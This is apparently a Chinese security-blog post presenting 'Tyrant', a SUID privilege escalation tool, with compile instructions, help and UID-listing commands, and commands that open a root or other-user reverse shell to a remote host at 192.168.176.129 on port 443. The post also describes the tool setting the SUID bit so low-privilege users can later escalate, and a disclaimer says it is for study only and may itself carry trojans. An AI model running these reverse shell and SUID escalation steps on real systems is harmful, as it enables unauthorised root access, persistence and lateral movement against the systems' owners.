Tyrant(暴君) SUID二进制文件权限提升工具

2025-01-25 8 0

Tyrant

Tyrant 是一个 SUID 二进制特权升级工具,权限提升或进行横向移动。

用法

使用以下命令编译源代码:

$ gcc tyrant.c -o tyrant

要显示帮助信息,请使用:

$ ./tyrant -h

Tyrant(暴君) SUID二进制文件权限提升工具插图

获取 UID

只需在没有任何参数的情况下运行该工具,即可列出当前用户的 UID 及其他用户详细信息:

$ ./tyrant

Tyrant(暴君) SUID二进制文件权限提升工具插图1

指定 UID 进行反向 Shell:根权限

**注意:**如果你尝试以低权限用户身份启动反向 Shell,将会失败。你必须结合 Tyrant 利用其他漏洞。

要以根权限启动反向 Shell,请执行:

# ./tyrant -uid 0 -rhost 192.168.176.129 -rport 443

Tyrant(暴君) SUID二进制文件权限提升工具插图2

执行后,Tyrant 将自动设置 SUID 位,允许低权限用户执行根权限升级操作。例如:

$ ./tyrant -uid 0 -rhost 192.168.176.129 -rport 443

Tyrant(暴君) SUID二进制文件权限提升工具插图3

Tyrant(暴君) SUID二进制文件权限提升工具插图4

指定其他 UID

你还可以通过指定另一个 UID 切换到不同的用户:

# ./tyrant -uid 33 -rhost 192.168.176.129 -rport 443

Tyrant(暴君) SUID二进制文件权限提升工具插图5


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

Tetragon:一款基于eBPF的运行时环境安全监控工具
Memcached DDoS 反射放大攻击(实验)
Chameleon(变色龙) 跨平台编译C文件,并一次性生成多个平台的可执行文件
Shiro CVE-2020-13933 路径绕过(越权)
MemProcFS-Analyzer:一款用于DFIR的Windows内存转储自动取证分析工具
[windows]自动锁屏程序

发布评论